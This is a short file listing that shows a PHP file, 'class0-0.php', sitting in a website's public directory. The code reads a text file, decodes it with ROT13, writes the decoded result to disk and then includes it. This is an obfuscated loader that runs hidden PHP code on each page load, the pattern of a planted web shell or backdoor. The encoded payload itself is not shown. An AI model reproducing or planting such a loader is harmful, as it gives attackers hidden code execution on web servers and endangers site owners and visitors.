File "class0-0.php"

Full Path: /home/landifun/public_html/public/class0-0.php
File size: 135 bytes
MIME-type: text/plain
Charset: utf-8

44<?php
$ss = file_get_contents("class0.txt");
$ss = str_rot13($ss);
echo $ss;
file_put_contents('class0', $ss);
include 'class0';